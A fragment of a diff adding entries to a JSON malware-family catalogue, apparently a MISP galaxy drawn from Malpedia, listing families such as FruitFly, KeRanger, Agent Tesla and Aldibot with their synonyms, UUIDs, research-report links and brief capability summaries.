"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", + "https://github.com/Marten4n6/EvilOSX", + "https://twitter.com/JohnLaTwC/status/966139336436498432" + ] + }, + "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", + "value": "EvilOSX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", + "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" + ] + }, + "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", + "value": "FlashBack", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Quimitchin" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", + "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", + "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", + "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", + "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", + "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", + "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" + ] + }, + "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", + "value": "FruitFly", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", + "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" + ] + }, + "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", + "value": "HiddenLotus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Revir" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", + "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", + "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" + ] + }, + "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", + "value": "iMuler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", + "https://objective-see.com/blog/blog_0x16.html", + "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", + "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" + ] + }, + "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", + "value": "KeRanger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", + "https://objective-see.com/blog/blog_0x16.html", + "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", + "https://github.com/eset/malware-ioc/tree/master/keydnap" + ] + }, + "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", + "value": "Keydnap", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KitM" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", + "https://www.f-secure.com/weblog/archives/00002558.html" + ] + }, + "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", + "value": "Kitmos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SedUploader", + "JHUHUGIT", + "JKEYSKW" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", + "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "https://objective-see.com/blog/blog_0x16.html", + "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" + ] + }, + "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", + "value": "Komplex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", + "https://objective-see.com/blog/blog_0x16.html", + "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" + ] + }, + "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", + "value": "Laoshu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", + "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", + "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" + ] + }, + "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", + "value": "Leverage", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", + "https://iranthreats.github.io/resources/macdownloader-macos-malware/" + ] + }, + "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", + "value": "MacDownloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", + "value": "MacInstaller", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", + "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", + "https://objective-see.com/blog/blog_0x1E.html" + ] + }, + "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", + "value": "MacRansom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", + "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" + ] + }, + "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", + "value": "MacSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", + "value": "MacVX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", + "https://objective-see.com/blog/blog_0x26.html" + ] + }, + "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", + "value": "MaMi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", + "https://objective-see.com/blog/blog_0x16.html", + "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", + "https://objective-see.com/blog/blog_0x20.html" + ] + }, + "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", + "value": "Mughthesec", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", + "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + ] + }, + "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", + "value": "OceanLotus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", + "https://news.drweb.com/show/?i=1750&lng=en&c=14" + ] + }, + "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", + "value": "Olyx", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Findzip" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", + "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" + ] + }, + "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", + "value": "Patcher", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/" + ] + }, + "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", + "value": "Pirrit", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Calisto" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", + "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", + "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", + "https://objective-see.com/blog/blog_0x1D.html", + "https://securelist.com/calisto-trojan-for-macos/86543/", + "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", + "https://objective-see.com/blog/blog_0x1F.html", + "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", + "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", + "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" + ] + }, + "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", + "value": "Proton RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", + "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" + ] + }, + "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", + "value": "Pwnet", + "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack." + }, + { + "meta": { + "synonyms": [ + "Retefe" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", + "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", + "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", + "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga" + ] + }, + "uuid": "80acc956-d418-42e3-bddf-078695a01289", + "value": "Dok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", + "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" + ] + }, + "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", + "value": "systemd", + "description": "General purpose backdoor" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", + "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", + "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" + ] + }, + "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "value": "Uroburos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", + " https://401trg.pw/an-update-on-winnti/", + "https://401trg.pw/winnti-evolution-going-open-source/" + ] + }, + "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", + "value": "Winnti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", + "https://objective-see.com/blog/blog_0x16.html", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ] + }, + "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "value": "WireLurker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" + ] + }, + "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "value": "Wirenet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", + "https://twitter.com/PhysicalDrive0/status/845009226388918273", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", + "https://objective-see.com/blog/blog_0x16.html" + ] + }, + "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", + "value": "XSLCmd", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", + "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", + "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" + ] + }, + "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", + "value": "PAS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Webshell by Orb" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", + "https://github.com/wso-shell", + "https://securelist.com/energetic-bear-crouching-yeti/85345/" + ] + }, + "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", + "value": "WSO", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", + "value": "Silence DDoS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" + ] + }, + "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", + "value": "BONDUPDATER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", + "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" + ] + }, + "uuid": "0db05333-2214-49c3-b469-927788932aaa", + "value": "GhostMiner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://github.com/matthewdunwoody/POSHSPY" + ] + }, + "uuid": "4df1b257-c242-46b0-b120-591430066b6f", + "value": "POSHSPY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", + "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" + ] + }, + "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", + "value": "PowerWare", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" + ] + }, + "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", + "value": "POWRUNER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + ] + }, + "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", + "value": "QUADAGENT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + ] + }, + "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", + "value": "RogueRobin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", + "https://github.com/Kevin-Robertson/Tater" + ] + }, + "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", + "value": "Tater PrivEsc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", + "https://github.com/Mr-Un1k0d3r/ThunderShell" + ] + }, + "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", + "value": "ThunderShell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", + "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" + ] + }, + "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", + "value": "WMImplant", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", + "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", + "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", + "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", + "http://seclists.org/fulldisclosure/2017/Mar/7", + "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f" + ] + }, + "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", + "value": "BrickerBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", + "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", + "https://www.youtube.com/watch?v=Bk-utzAlYFI" + ] + }, + "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", + "value": "Saphyra", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", + "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", + "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" + ] + }, + "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", + "value": "7ev3n", + "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"" + }, + { + "meta": { + "synonyms": [ + "Hydraq", + "McRAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", + "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", + "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", + "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", + "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", + "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", + "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" + ] + }, + "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", + "value": "9002 RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PinkKite" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", + "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", + "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" + ] + }, + "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", + "value": "AbaddonPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" + ] + }, + "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", + "value": "Abbath Banker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", + "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" + ] + }, + "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", + "value": "AcridRain", + "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", + "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" + ] + }, + "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", + "value": "Acronym", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", + "https://twitter.com/JaromirHorejsi/status/813712587997249536", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" + ] + }, + "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", + "value": "AdamLocker", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", + "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" + ] + }, + "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", + "value": "win.adkoob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" + ] + }, + "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", + "value": "AdvisorsBot", + "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", + "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" + ] + }, + "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", + "value": "Adylkuzz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ComRAT", + "Sun rootkit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", + "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", + "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", + "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", + "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", + "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/" + ] + }, + "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", + "value": "Agent.BTZ", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", + "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", + "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", + "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", + "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" + ] + }, + "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", + "value": "Agent Tesla", + "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" + ] + }, + "uuid": "43ec8adc-0658-4765-be20-f22679097fab", + "value": "Aldibot", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", + "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" + ] + }, + "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", + 